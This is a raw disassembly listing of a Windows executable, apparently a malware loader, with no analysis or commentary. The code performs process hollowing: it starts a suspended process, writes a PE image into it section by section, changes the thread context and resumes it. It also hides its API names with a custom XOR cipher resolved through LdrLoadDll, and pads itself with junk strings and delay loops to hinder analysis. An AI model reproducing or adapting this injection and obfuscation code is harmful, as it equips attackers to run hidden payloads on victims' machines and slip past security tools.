movzx edx, dx
add edx, eax
mov [esp+4+var_4], edx
mov eax, [esp+4+var_4]
pop edx
retn
sub_403E38 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403E48 proc near ; CODE XREF: sub_403E54+1EA�p
shr eax, 1Dh
mov eax, ds:dword_4060A4[eax*4]
retn
sub_403E48 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403E54 proc near ; CODE XREF: CODE:00404E7C�p
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_1B4 = dword ptr -1B4h
var_1B0 = dword ptr -1B0h
var_14C = dword ptr -14Ch
var_A8 = dword ptr -0A8h
var_9C = dword ptr -9Ch
var_80 = dword ptr -80h
var_50 = word ptr -50h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1D = byte ptr -1Dh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFEB4h
push ebx
push esi
push edi
mov [ebp+var_4], edx
mov edi, eax
mov eax, [ebp+var_4]
call sub_4036CC
xor eax, eax
push ebp
push offset loc_404123
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_28], 8
xor eax, eax
mov [ebp+var_24], eax
mov esi, 1
lea eax, [ebp+var_3C]
mov ecx, [ebp+var_24]
mov edx, 10h
call sub_402B4C
lea eax, [ebp+var_80]
mov ecx, [ebp+var_24]
mov edx, 44h
call sub_402B4C
mov [ebp+var_80], 44h
mov [ebp+var_50], 1
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_80]
push eax
push 0
push 0
push 4
push 0
push 0
push 0
call sub_403D50 ; GetCommandLineA
push eax
mov eax, [ebp+var_4]
call sub_4036DC
push eax
mov eax, ds:off_4060DC
mov eax, [eax]
call eax
test eax, eax
jz loc_40410D
mov [ebp+var_1D], 1
xor eax, eax
push ebp
push offset loc_404106
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_14C], 10002h
lea eax, [ebp+var_14C]
push eax
mov eax, [ebp+var_38]
push eax
mov eax, ds:off_4060E0
mov eax, [eax]
call eax
test eax, eax
jz loc_4040CF
lea eax, [ebp+var_C]
push eax
push 4
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+var_A8]
xor edx, edx
push edx
push eax
mov eax, [ebp+var_28]
cdq
add eax, [esp+1B4h+var_1B4]
adc edx, [esp+1B4h+var_1B0]
add esp, 8
push eax
mov eax, [ebp+var_3C]
push eax
mov eax, ds:off_4060FC
mov eax, [eax]
call eax
test eax, eax
jz loc_4040CF
mov edx, [ebp+var_8]
mov eax, [ebp+var_3C]
call sub_403E2C
cmp eax, [ebp+var_24]
jl loc_4040CF
test edi, edi
jz loc_4040CF
mov eax, [edi+3Ch]
add eax, edi
mov [ebp+var_18], eax
push 4
push 3000h
mov eax, [ebp+var_18]
mov eax, [eax+50h]
push eax
mov eax, [ebp+var_18]
mov eax, [eax+34h]
push eax
mov eax, [ebp+var_3C]
push eax
mov eax, ds:off_4060E8
mov eax, [eax]
call eax
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz loc_4040CF
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+var_18]
mov eax, [eax+54h]
push eax
push edi
mov eax, [ebp+var_8]
push eax
mov eax, [ebp+var_3C]
push eax
mov eax, ds:off_4060D4
mov eax, [eax]
call eax
test eax, eax
jz loc_4040CF
mov eax, [ebp+var_18]
mov dx, [eax+14h]
mov eax, [ebp+var_18]
add eax, 18h
call sub_403E38
mov [ebp+var_1C], eax
mov ebx, [ebp+var_24]
mov eax, [ebp+var_18]
movzx eax, word ptr [eax+6]
sub eax, esi
sub eax, ebx
jb short loc_40406A
inc eax
mov [ebp+var_2C], eax
loc_403FFE: ; CODE XREF: sub_403E54+214�j
lea eax, [ebp+var_10]
push eax
lea esi, [ebx+ebx*4]
mov eax, [ebp+var_1C]
mov eax, [eax+esi*8+10h]
push eax
mov eax, [ebp+var_1C]
mov eax, [eax+esi*8+14h]
add eax, edi
push eax
mov eax, [ebp+var_1C]
mov eax, [eax+esi*8+0Ch]
add eax, [ebp+var_8]
push eax
mov eax, [ebp+var_3C]
push eax
mov eax, ds:off_4060D4
mov eax, [eax]
call eax
test eax, eax
jz short loc_404064
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+var_1C]
mov eax, [eax+esi*8+24h]
call sub_403E48
push eax
mov eax, [ebp+var_1C]
mov eax, [eax+esi*8+8]
push eax
mov eax, [ebp+var_1C]
mov eax, [eax+esi*8+0Ch]
add eax, [ebp+var_8]
push eax
mov eax, [ebp+var_3C]
push eax
mov eax, ds:off_4060F8
mov eax, [eax]
call eax
loc_404064: ; CODE XREF: sub_403E54+1DD�j
inc ebx
dec [ebp+var_2C]
jnz short loc_403FFE
loc_40406A: ; CODE XREF: sub_403E54+1A4�j
lea eax, [ebp+var_10]
push eax
push 4
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+var_A8]
xor edx, edx
push edx
push eax
mov eax, [ebp+var_28]
cdq
add eax, [esp+218h+var_218]
adc edx, [esp+218h+var_214]
add esp, 8
push eax
mov eax, [ebp+var_3C]
push eax
mov eax, ds:off_4060D4
mov eax, [eax]
call eax
test eax, eax
jz short loc_4040CF
mov eax, [ebp+var_18]
mov edx, [eax+28h]
mov eax, [ebp+var_8]
call sub_403E24
mov [ebp+var_9C], eax
lea eax, [ebp+var_14C]
push eax
mov eax, [ebp+var_38]
push eax
mov eax, ds:off_40610C
mov eax, [eax]
call eax
cmp eax, 1
sbb eax, eax
inc eax
mov [ebp+var_1D], al
loc_4040CF: ; CODE XREF: sub_403E54+CB�j
; sub_403E54+103�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40410D
loc_4040DC: ; CODE XREF: sub_403E54+2B7�j
cmp [ebp+var_1D], 0
jnz short loc_4040F5
mov eax, [ebp+var_24]
push eax
mov eax, [ebp+var_3C]
push eax
mov eax, ds:off_406108
mov eax, [eax]
call eax
jmp short loc_404102
; ---------------------------------------------------------------------------
loc_4040F5: ; CODE XREF: sub_403E54+28C�j
mov eax, [ebp+var_38]
push eax
mov eax, ds:off_4060D0
mov eax, [eax]
call eax
loc_404102: ; CODE XREF: sub_403E54+29F�j
mov bl, [ebp+var_1D]
retn
; ---------------------------------------------------------------------------
loc_404106: ; DATA XREF: sub_403E54+A0�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_4040DC
; ---------------------------------------------------------------------------
loc_40410D: ; CODE XREF: sub_403E54+93�j
; DATA XREF: sub_403E54+283�o
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40412A
loc_40411A: ; CODE XREF: sub_403E54+2D4�j
lea eax, [ebp+var_4]
call sub_403518
retn
; ---------------------------------------------------------------------------
loc_404123: ; DATA XREF: sub_403E54+1C�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_40411A
; ---------------------------------------------------------------------------
loc_40412A: ; CODE XREF: sub_403E54+2CE�j
; DATA XREF: sub_403E54+2C1�o
mov eax, ebx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403E54 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404134 proc near ; DATA XREF: CODE:004045C0�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_404159
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4076B4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404160
loc_404158: ; CODE XREF: sub_404134+2A�j
retn
; ---------------------------------------------------------------------------
loc_404159: ; DATA XREF: sub_404134+6�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_404158
; ---------------------------------------------------------------------------
loc_404160: ; CODE XREF: sub_404134:loc_404158�j
; DATA XREF: sub_404134+1F�o
pop ebp
retn
sub_404134 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_404164 proc near ; DATA XREF: CODE:004045BC�o
sub ds:dword_4076B4, 1
retn
sub_404164 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40416C proc near ; DATA XREF: CODE:004045C8�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_404191
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4076B8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404198
loc_404190: ; CODE XREF: sub_40416C+2A�j
retn
; ---------------------------------------------------------------------------
loc_404191: ; DATA XREF: sub_40416C+6�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_404190
; ---------------------------------------------------------------------------
loc_404198: ; CODE XREF: sub_40416C:loc_404190�j
; DATA XREF: sub_40416C+1F�o
pop ebp
retn
sub_40416C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40419C proc near ; DATA XREF: CODE:004045C4�o
sub ds:dword_4076B8, 1
retn
sub_40419C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041A4 proc near ; DATA XREF: CODE:004045D0�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_4041C9
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4076BC
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4041D0
loc_4041C8: ; CODE XREF: sub_4041A4+2A�j
retn
; ---------------------------------------------------------------------------
loc_4041C9: ; DATA XREF: sub_4041A4+6�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_4041C8
; ---------------------------------------------------------------------------
loc_4041D0: ; CODE XREF: sub_4041A4:loc_4041C8�j
; DATA XREF: sub_4041A4+1F�o
pop ebp
retn
sub_4041A4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4041D4 proc near ; DATA XREF: CODE:004045CC�o
sub ds:dword_4076BC, 1
retn
sub_4041D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041DC proc near ; DATA XREF: CODE:004045D8�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_404201
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4076C0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404208
loc_404200: ; CODE XREF: sub_4041DC+2A�j
retn
; ---------------------------------------------------------------------------
loc_404201: ; DATA XREF: sub_4041DC+6�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_404200
; ---------------------------------------------------------------------------
loc_404208: ; CODE XREF: sub_4041DC:loc_404200�j
; DATA XREF: sub_4041DC+1F�o
pop ebp
retn
sub_4041DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40420C proc near ; DATA XREF: CODE:004045D4�o
sub ds:dword_4076C0, 1
retn
sub_40420C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404214 proc near ; DATA XREF: CODE:004045E0�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_404239
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4076C4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404240
loc_404238: ; CODE XREF: sub_404214+2A�j
retn
; ---------------------------------------------------------------------------
loc_404239: ; DATA XREF: sub_404214+6�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_404238
; ---------------------------------------------------------------------------
loc_404240: ; CODE XREF: sub_404214:loc_404238�j
; DATA XREF: sub_404214+1F�o
pop ebp
retn
sub_404214 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_404244 proc near ; DATA XREF: CODE:004045DC�o
sub ds:dword_4076C4, 1
retn
sub_404244 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40424C proc near ; CODE XREF: sub_40445C+47�p
jmp ds:dword_40815C
sub_40424C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404254 proc near ; CODE XREF: sub_40445C+20�p
jmp ds:dword_408158
sub_404254 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40425C proc near ; CODE XREF: sub_40445C+2F�p
jmp ds:dword_408154
sub_40425C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404264 proc near ; CODE XREF: sub_40445C+11�p
jmp ds:dword_408150
sub_404264 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40426C proc near ; DATA XREF: CODE:004045E8�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_404291
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4076C8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404298
loc_404290: ; CODE XREF: sub_40426C+2A�j
retn
; ---------------------------------------------------------------------------
loc_404291: ; DATA XREF: sub_40426C+6�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_404290
; ---------------------------------------------------------------------------
loc_404298: ; CODE XREF: sub_40426C:loc_404290�j
; DATA XREF: sub_40426C+1F�o
pop ebp
retn
sub_40426C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40429C proc near ; DATA XREF: CODE:004045E4�o
sub ds:dword_4076C8, 1
retn
sub_40429C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4042A4 proc near ; CODE XREF: CODE:00404771�p
; CODE:0040478D�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFD4h
push ebx
push esi
push edi
xor ebx, ebx
mov [ebp+var_2C], ebx
mov [ebp+var_28], ebx
mov [ebp+var_18], ebx
mov [ebp+var_C], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_4036CC
mov eax, [ebp+var_8]
call sub_4036CC
xor eax, eax
push ebp
push offset loc_40444C
push dword ptr fs:[eax]
mov fs:[eax], esp
xor esi, esi
lea eax, [ebp+var_18]
call sub_403518
mov eax, [ebp+var_8]
call sub_403680
test eax, eax
jle short loc_404310
mov [ebp+var_20], eax
mov ebx, 1
loc_4042FD: ; CODE XREF: sub_4042A4+6A�j
mov eax, [ebp+var_8]
movzx eax, byte ptr [eax+ebx-1]
cdq
idiv ebx
xor esi, edx
inc ebx
dec [ebp+var_20]
jnz short loc_4042FD
loc_404310: ; CODE XREF: sub_4042A4+4F�j
cmp esi, 0FFh
jle short loc_404334
loc_404318: ; CODE XREF: sub_4042A4+8E�j
sar esi, 1
jns short loc_40431F
adc esi, 0
loc_40431F: ; CODE XREF: sub_4042A4+76�j
mov [ebp+var_24], esi
fild [ebp+var_24]
call sub_402AE8
mov esi, eax
cmp esi, 0FFh
jg short loc_404318
loc_404334: ; CODE XREF: sub_4042A4+72�j
mov eax, [ebp+var_4]
call sub_403680
test eax, eax
jle loc_404411
mov [ebp+var_20], eax
mov ebx, 1
loc_40434C: ; CODE XREF: sub_4042A4+167�j
mov eax, [ebp+var_8]
call sub_403680
push eax
mov eax, ebx
pop edx
mov ecx, edx
cdq
idiv ecx
mov [ebp+var_1C], edx
inc [ebp+var_1C]
mov eax, [ebp+var_4]
call sub_403680
xor eax, ebx
mov edx, [ebp+var_8]
mov ecx, [ebp+var_1C]
movzx edx, byte ptr [edx+ecx-1]
mov ecx, edx
cdq
idiv ecx
mov [ebp+var_10], edx
inc [ebp+var_10]
mov eax, ebx
cdq
idiv [ebp+var_10]
mov eax, esi
xor dl, al
mov eax, [ebp+var_4]
mov al, [eax+ebx-1]
mov ecx, ebx
and ecx, 8000007Fh
jns short loc_4043A3
dec ecx
or ecx, 0FFFFFF80h
inc ecx
loc_4043A3: ; CODE XREF: sub_4042A4+F8�j
xor al, cl
mov ecx, [ebp+var_8]
mov edi, [ebp+var_1C]
movzx ecx, byte ptr [ecx+edi-1]
add ecx, ecx
shr ecx, 2
xor al, cl
xor dl, al
mov [ebp+var_11], dl
mov eax, ebx
and eax, 80000001h
jns short loc_4043CA
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_4043CA: ; CODE XREF: sub_4042A4+11F�j
test eax, eax
jnz short loc_4043E6
lea eax, [ebp+var_28]
mov dl, [ebp+var_11]
call sub_403628
mov edx, [ebp+var_28]
lea eax, [ebp+var_18]
call sub_403688
jmp short loc_404407
; ---------------------------------------------------------------------------
loc_4043E6: ; CODE XREF: sub_4042A4+128�j
lea eax, [ebp+var_2C]
xor edx, edx
mov dl, [ebp+var_11]
push edx
mov edx, 0FFh
pop ecx
sub edx, ecx
call sub_403628
mov edx, [ebp+var_2C]
lea eax, [ebp+var_18]
call sub_403688
loc_404407: ; CODE XREF: sub_4042A4+140�j
inc ebx
dec [ebp+var_20]
jnz loc_40434C
loc_404411: ; CODE XREF: sub_4042A4+9A�j
mov eax, [ebp+var_C]
mov edx, [ebp+var_18]
call sub_40356C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404453
loc_404429: ; CODE XREF: sub_4042A4+1AD�j
lea eax, [ebp+var_2C]
mov edx, 2
call sub_40353C
lea eax, [ebp+var_18]
call sub_403518
lea eax, [ebp+var_8]
mov edx, 2
call sub_40353C
retn
; ---------------------------------------------------------------------------
loc_40444C: ; DATA XREF: sub_4042A4+30�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_404429
; ---------------------------------------------------------------------------
loc_404453: ; CODE XREF: sub_4042A4+1A7�j
; DATA XREF: sub_4042A4+180�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4042A4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40445C proc near ; CODE XREF: CODE:004047AD�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
push ebx
push esi
push edi
add esp, 0FFFFFFF0h
mov edi, edx
xor esi, esi
xor edx, edx
mov [esp+1Ch+var_1C], edx
push eax
push ebx
call sub_404264 ; RtlInitUnicodeString
lea eax, [esp+1Ch+var_18]
push eax
push ebx
push 0
push 0
call sub_404254 ; LdrLoadDll
test eax, eax
jnz short loc_4044B3
push edi
lea eax, [esp+20h+var_10]
push eax
call sub_40425C ; RtlInitString
lea eax, [esp+1Ch+var_14]
push eax
movzx eax, si
push eax
lea eax, [esp+24h+var_10]
push eax
mov eax, [esp+28h+var_18]
push eax
call sub_40424C ; LdrGetProcedureAddress
test eax, eax
jnz short loc_4044B3
mov eax, [esp+1Ch+var_14]
mov [esp+1Ch+var_1C], eax
loc_4044B3: ; CODE XREF: sub_40445C+27�j
; sub_40445C+4E�j
mov eax, [esp+1Ch+var_1C]
add esp, 10h
pop edi
pop esi
pop ebx
retn
sub_40445C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044C0 proc near ; CODE XREF: CODE:00404642�p
; CODE:00404CEB�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
mov [ebp+var_8], edx
mov [ebp+var_4], eax
lea edx, [ebp+var_C]
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_C], eax
mov eax, [edx]
mov esp, ebp
pop ebp
retn
sub_4044C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044E0 proc near ; CODE XREF: CODE:00404DCD�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_4036CC
xor eax, eax
push ebp
push offset loc_404543
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, esi
mov edx, offset aHelloworld ; "HelloWorld"
call sub_40356C
mov ebx, 1
loc_404512: ; CODE XREF: sub_4044E0+4B�j
cmp ebx, 1869Fh
jnz short loc_404524
mov eax, esi
mov edx, [ebp+var_4]
call sub_40356C
loc_404524: ; CODE XREF: sub_4044E0+38�j
inc ebx
cmp ebx, 186A1h
jnz short loc_404512
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40454A
loc_40453A: ; CODE XREF: sub_4044E0+68�j
lea eax, [ebp+var_4]
call sub_403518
retn
; ---------------------------------------------------------------------------
loc_404543: ; DATA XREF: sub_4044E0+16�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_40453A
; ---------------------------------------------------------------------------
loc_40454A: ; CODE XREF: sub_4044E0+62�j
; DATA XREF: sub_4044E0+55�o
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_4044E0 endp
; ---------------------------------------------------------------------------
align 10h
dd 0FFFFFFFFh, 0Ah
aHelloworld db 'HelloWorld',0 ; DATA XREF: sub_4044E0+23�o
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404564 proc near ; DATA XREF: CODE:004045F0�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_404583
push dword ptr fs:[eax]
mov fs:[eax], esp
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40458A
loc_404582: ; CODE XREF: sub_404564+24�j
retn
; ---------------------------------------------------------------------------
loc_404583: ; DATA XREF: sub_404564+6�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_404582
; ---------------------------------------------------------------------------
loc_40458A: ; CODE XREF: sub_404564:loc_404582�j
; DATA XREF: sub_404564+19�o
pop ebp
retn
sub_404564 endp
; ---------------------------------------------------------------------------
dword_40458C dd 0Ch ; BSS:off_407628�o
dd offset off_404594
off_404594 dd offset loc_403D08 ; DATA XREF: CODE:00404590�o
dd offset sub_403CD8
dd offset sub_403AE4
dd offset sub_403A90
dd offset sub_403D40
dd offset sub_403D10
dd offset sub_403D90
dd offset sub_403D60
dd offset sub_403E1C
dd offset sub_403DEC
dd offset sub_404164
dd offset sub_404134
dd offset sub_40419C
dd offset sub_40416C
dd offset sub_4041D4
dd offset sub_4041A4
dd offset sub_40420C
dd offset sub_4041DC
dd offset sub_404244
dd offset sub_404214
dd offset sub_40429C
dd offset sub_40426C
align 10h
dd offset sub_404564
; ---------------------------------------------------------------------------
public start
start:
push ebp
mov ebp, esp
mov ecx, 12h
loc_4045FC: ; CODE XREF: CODE:00404601�j
push 0
push 0
dec ecx
jnz short loc_4045FC
push ecx
push ebx
push esi
mov eax, offset dword_40458C
call sub_403C94
mov esi, ds:off_406104
xor eax, eax
push ebp
push offset loc_404EBD
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, 5
call sub_402B6C
add eax, 0CC619h
push eax
mov eax, 32h
call sub_402B6C
add eax, 5
pop edx
call sub_4044C0
mov ds:dword_407804, eax
cmp ds:dword_407804, 5
jz loc_404754
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
mov eax, offset dword_40780C
mov edx, offset aLopakote124 ; "lopakote124"
call sub_40356C
mov eax, offset dword_407810
mov edx, offset aVibapida36 ; "vibapida36"
call sub_40356C
mov eax, offset dword_407814
mov edx, offset aYorawapa87 ; "yorawapa87"
call sub_40356C
mov eax, offset dword_407818
mov edx, offset aTivoriso84 ; "tivoriso84"
call sub_40356C
mov eax, offset dword_40781C
mov edx, offset aNoyetavo43 ; "noyetavo43"
call sub_40356C
mov eax, offset dword_407820
mov edx, offset aMoboyaja108 ; "moboyaja108"
call sub_40356C
mov eax, offset dword_407824
mov edx, offset aFofigaba70 ; "fofigaba70"
call sub_40356C
mov eax, offset dword_407828
mov edx, offset aPecipowe36 ; "pecipowe36"
call sub_40356C
mov eax, offset dword_40782C
mov edx, offset aSasapero105 ; "sasapero105"
call sub_40356C
mov eax, offset dword_407830
mov edx, offset aWohepodo79 ; "wohepodo79"
call sub_40356C
mov eax, offset dword_407834
mov edx, offset aHakifoxi63 ; "hakifoxi63"
call sub_40356C
mov eax, offset dword_407838
mov edx, offset aWonexifi78 ; "wonexifi78"
call sub_40356C
mov eax, offset dword_40783C
mov edx, offset aBelogoki68 ; "belogoki68"
call sub_40356C
mov eax, offset dword_40780C
mov edx, offset a00000010000000 ; "000000100000000000000000200000000000000"...
call sub_40356C
mov eax, 0Ah
call sub_402B6C
mov eax, 578h
call sub_402B6C
xor eax, eax
mov ds:dword_407808, eax
loc_404754: ; CODE XREF: CODE:00404653�j
mov eax, offset dword_4077F8
mov edx, offset aQnkomxlZe78 ; "|[}QnkomxL%ZE]78"
call sub_40356C
lea ecx, [ebp-14h]
mov edx, ds:dword_4077F8
mov eax, offset dword_405078
call sub_4042A4
mov eax, [ebp-14h]
call sub_4036DC
push eax
lea ecx, [ebp-1Ch]
mov edx, ds:dword_4077F8
mov eax, offset dword_405090
call sub_4042A4
mov eax, [ebp-1Ch]
call sub_4036DC
mov edx, eax
lea eax, [ebp-18h]
call sub_403890
mov eax, [ebp-18h]
call sub_4038C0
pop edx
call sub_40445C
mov [esi], eax
lea ecx, [ebp-20h]
mov edx, ds:dword_4077F8
mov eax, offset dword_405090
call sub_4042A4
mov eax, [ebp-20h]
call sub_4036DC
push eax
call sub_403D58 ; LoadLibraryA
mov ebx, eax
lea ecx, [ebp-24h]
mov edx, ds:dword_4077F8
mov eax, offset dword_4050A8
call sub_4042A4
mov eax, [ebp-24h]
call sub_4036DC
push eax
call sub_403D58 ; LoadLibraryA
mov ds:dword_4077E8, eax
lea ecx, [ebp-28h]
mov edx, ds:dword_4077F8
mov eax, offset dword_4050BC
call sub_4042A4
mov eax, [ebp-28h]
call sub_4036DC
push eax
call sub_403D58 ; LoadLibraryA
mov ds:dword_4077EC, eax
lea ecx, [ebp-2Ch]
mov edx, ds:dword_4077F8
mov eax, offset aDeoulzFIaDk@Md ; "EUZf{aD@MA"
call sub_4042A4
mov eax, [ebp-2Ch]
call sub_4036DC
push eax
mov eax, ds:dword_4077E8
push eax
mov eax, [esi]
call eax
mov edx, ds:off_4060D8
mov [edx], eax
lea ecx, [ebp-30h]
mov edx, ds:dword_4077F8
mov eax, offset dword_4050F4
call sub_4042A4
mov eax, [ebp-30h]
call sub_4036DC
push eax
push ebx
mov eax, [esi]
call eax
mov edx, ds:off_4060CC
mov [edx], eax
lea ecx, [ebp-34h]
mov edx, ds:dword_4077F8
mov eax, offset dword_40510C
call sub_4042A4
mov eax, [ebp-34h]
call sub_4036DC
push eax
push ebx
mov eax, [esi]
call eax
mov edx, ds:off_4060EC
mov [edx], eax
lea ecx, [ebp-38h]
mov edx, ds:dword_4077F8
mov eax, offset dword_405124
call sub_4042A4
mov eax, [ebp-38h]
call sub_4036DC
push eax
push ebx
mov eax, [esi]
call eax
mov edx, ds:off_4060F0
mov [edx], eax
lea ecx, [ebp-3Ch]
mov edx, ds:dword_4077F8
mov eax, offset dword_40513C
call sub_4042A4
mov eax, [ebp-3Ch]
call sub_4036DC
push eax
push ebx
mov eax, [esi]
call eax
mov edx, ds:off_406100
mov [edx], eax
lea ecx, [ebp-40h]
mov edx, ds:dword_4077F8
mov eax, offset dword_405154
call sub_4042A4
mov eax, [ebp-40h]
call sub_4036DC
push eax
push ebx
mov eax, [esi]
call eax
mov edx, ds:off_4060F4
mov [edx], eax
lea ecx, [ebp-44h]
mov edx, ds:dword_4077F8
mov eax, offset dword_40516C
call sub_4042A4
mov eax, [ebp-44h]
call sub_4036DC
push eax
push ebx
mov eax, [esi]
call eax
mov edx, ds:off_4060C8
mov [edx], eax
lea ecx, [ebp-48h]
mov edx, ds:dword_4077F8
mov eax, offset dword_405180
call sub_4042A4
mov eax, [ebp-48h]
call sub_4036DC
push eax
push ebx
mov eax, [esi]
call eax
mov edx, ds:off_4060E8
mov [edx], eax
lea ecx, [ebp-4Ch]
mov edx, ds:dword_4077F8
mov eax, offset aIIoZiZqkkCkz ; "[OZ`qKcZ"
call sub_4042A4
mov eax, [ebp-4Ch]
call sub_4036DC
push eax
push ebx
mov eax, [esi]
call eax
mov edx, ds:off_4060F8
mov [edx], eax
lea ecx, [ebp-50h]
mov edx, ds:dword_4077F8
mov eax, offset aI@Ogk_NRrvlY ; "@Ok_{]rLY"
call sub_4042A4
mov eax, [ebp-50h]
call sub_4036DC
push eax
push ebx
mov eax, [esi]
call eax
mov edx, ds:off_4060D4
mov [edx], eax
lea ecx, [ebp-54h]
mov edx, ds:dword_4077F8
mov eax, offset aMw_ciksMncZap ; "W_ISmczP"
call sub_4042A4
mov eax, [ebp-54h]
call sub_4036DC
push eax
push ebx
mov eax, [esi]
call eax
mov edx, ds:off_4060FC
mov [edx], eax
lea ecx, [ebp-58h]
mov edx, ds:dword_4077F8
mov eax, offset aSwpooiaq@ircv ; "WoIQ]@rV"
call sub_4042A4
mov eax, [ebp-58h]
